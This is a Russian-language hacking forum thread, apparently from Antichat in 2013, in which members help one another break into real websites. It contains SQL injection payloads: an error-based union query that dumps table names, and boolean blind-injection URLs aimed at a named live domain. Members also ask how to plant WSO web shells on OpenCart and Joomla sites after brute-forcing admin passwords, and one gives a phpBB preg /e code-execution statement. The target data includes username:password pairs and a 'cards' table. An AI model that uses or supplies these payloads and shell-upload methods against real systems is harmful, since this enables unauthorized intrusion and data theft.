Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Эх да ' фильтрует(
    Да с пробелом и без пробовал.. всё равно та же ошибка
    http://clip.corp.mail.ru/clip/m517/1380815456-clip-22kb-sVmu65bUCDSD.png

    /название бд достал card
     
    #22541 zombak18, 3 Oct 2013
    Last edited: 3 Oct 2013
  2. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Всё, что идёт перед select+count.. должно быть или после юниона, или в скобках после какого-либо оператора(or,and т.д) и желательно с row().
    Как уже говорили, апострофы фильтруются, без них и без полного пути к каталогу с сайтом, шелл не реально залить)
     
    #22542 Inoms, 3 Oct 2013
    Last edited: 3 Oct 2013
  3. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    лс глянь.. сайтик кинул
    у меня уже не варит :(

    при
    пишет [​IMG]
     
    #22543 zombak18, 3 Oct 2013
    Last edited: 3 Oct 2013
  4. wx0

    wx0 New Member

    Joined:
    2 Oct 2013
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Обычно эта ошибка от неправильного запроса, нужно для начала найти точку опорную без ошибки и постепенно менять запрос. Есть разные тулзы для такого, но если надо в ручную, могу помочь подобрать запрос если это будет возможно. Если что в лс
     
  5. Inoms

    Inoms Member

    Joined:
    23 Jun 2013
    Messages:
    103
    Likes Received:
    29
    Reputations:
    45
    Юнион там без полезен, он ничего не отображает, работает только по ошибкам всё.
    ЗЫ: union select+1,2,3,4,count(*),concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2)) x from information_schema.tables group by x -- t
     
  6. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    [​IMG]

    :(
     
  7. YaBtr

    YaBtr Members of Antichat

    Joined:
    30 May 2012
    Messages:
    601
    Likes Received:
    350
    Reputations:
    652
    cards - первая таблица, так как limit n,1, где n=0

    дальше перебирай с помощью лимита, n=n+1

    UPD

    смотри

    [​IMG]

    Вот это запрос на выборку данных (username и password) из таблицы user. (то, что в области с красной границей, это и есть данные вида username:password).
    Для перебора используем лимит(то, что в области с желтой границей).
     
    #22547 YaBtr, 3 Oct 2013
    Last edited: 3 Oct 2013
  8. aivi

    aivi New Member

    Joined:
    18 Apr 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    Всем доброго времени суток, подскажите как узнать имя залитого файла. залил шелл формата wso2.php.jpg

    Движок на который заливал OpenCart
     
  9. zombak18

    zombak18 New Member

    Joined:
    2 Oct 2011
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Подскажите..
    Как из запроса
    сделать запрос по получению всех таблиц или столбцов из таблицы Cards
     
  10. psihoz26

    psihoz26 Members of Antichat

    Joined:
    22 Nov 2010
    Messages:
    545
    Likes Received:
    159
    Reputations:
    324
    Code:
    $result = mysql_query("SELECT * FROM profiles where login = '$username' and sa = '$otvet_na_vopros' and sq = '$u2'") or die("niiiii");
    
    тут только в слепую крутить получается через benchmark

    в других же случаях выдает niiiii =\

    подскажите как ещё попробовать??
     
  11. mmx2012

    mmx2012 New Member

    Joined:
    11 Jun 2012
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Приветствую!

    Дано: joomla 2.5.x, читалка файлов (через скрипт с file_get_contents), одна слепая скуля и в результате нее (сбрутил пароль из users) доступ в админку джумлы с правами редактора. Вопрос: как залить шелл? Нифига не получается - уже голову всю сломал. Через png с прицепленым к концу wso shell не получается, да и file_priv = N, соответственно через INTO OUTFILE тоже мимо
     
    #22551 mmx2012, 4 Oct 2013
    Last edited: 4 Oct 2013
  12. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Помогите раскрутить, через sqlmap не получается у меня.
    info(.)dra(c)onic(.)ru/?part=npcs&id=95%27%22\%27\%22\ - без ( )
     
  13. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    Зависит от того, что потом происходит с данными из $result.


    Запятые вырезаются
    http://info.draconic.ru/?part=npcs&id=95 and mid(version()from 1 for 1)=5
     
  14. Massay

    Massay New Member

    Joined:
    6 Mar 2013
    Messages:
    21
    Likes Received:
    1
    Reputations:
    0
    Перешел по ссылке ничего не произошло. Скажите пожалуйста можно розкрутить sql injection по моей ссылке. Если да, буду вам очень признателен за помощь.
     
  15. er9j6@

    er9j6@ Elder - Старейшина

    Joined:
    17 Sep 2011
    Messages:
    393
    Likes Received:
    40
    Reputations:
    23
    думаю , что нет
     
  16. EoGeneo

    EoGeneo Member

    Joined:
    29 Aug 2009
    Messages:
    127
    Likes Received:
    9
    Reputations:
    1
    101% ничего не выйдет
     
  17. wacky

    wacky Member

    Joined:
    30 Jan 2012
    Messages:
    42
    Likes Received:
    7
    Reputations:
    6
    Раскрутить можно как классическую слепую
    Code:
    function AntiInject($str, $max_len = 500)
    {
     $words = array("\\", "'", ",", ";", "--", "%20", "%27", "$", "*", "WHERE", "DELETE", "DROP", "SELECT", "UPDATE", "INSERT", "EXEC", "TRUNCATE", "SHUTDOWN", "<", ">");
    /* replacing < > , ----->>*/ $str = trim(str_replace($words, "", $str));
     if (strlen($str)>$max_len) $str = "";
     return $str;
    }
    
    Доставило, что при проверке содержимое не приводится к общему регистру.

    +
    http://info.draconic.ru/?part=npcs&id=95 and mid((select version())from 1 for 1)=5

    -
    http://info.draconic.ru/?part=npcs&id=95 and mid((select version())from 1 for 1)=4
     
    #22557 wacky, 5 Oct 2013
    Last edited: 5 Oct 2013
  18. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,413
    Likes Received:
    910
    Reputations:
    863
    попробуй через востонавление БД, создаешь файлик, в нем прописываешь:
    PHP:
    UPDATE nuke_bbusers SET user_sig_bbcode_uid='(.+)/e\0'user_sig='phpbb:phpinfo()' WHERE user_id=2;
    потом идешь в профиль аккаунта и смотришь выполнится ли пхпинфо user_id=2 это акк к которому есть доступ, по умолчанию админский прописан...
     
    _________________________
    1 person likes this.
  19. qaz

    qaz Elder - Старейшина

    Joined:
    12 Jul 2010
    Messages:
    1,551
    Likes Received:
    173
    Reputations:
    75
    перерыл всю админку, нема в третей версии возможности загрузить файл для востановления БД
     
  20. kilo_star

    kilo_star New Member

    Joined:
    21 Apr 2013
    Messages:
    23
    Likes Received:
    1
    Reputations:
    0
    Растолкуйте пожалуйста запрос:
    concat((select+table_name from information_schema.tables where table_schema=database() limit 0,1),0x3a,floor(rand(0)*2))

    что он делает? по идее вроде после 0x3a ожидается ввод параметра или нет?

    и для чего здесь count(*)?
     
Thread Status:
Not open for further replies.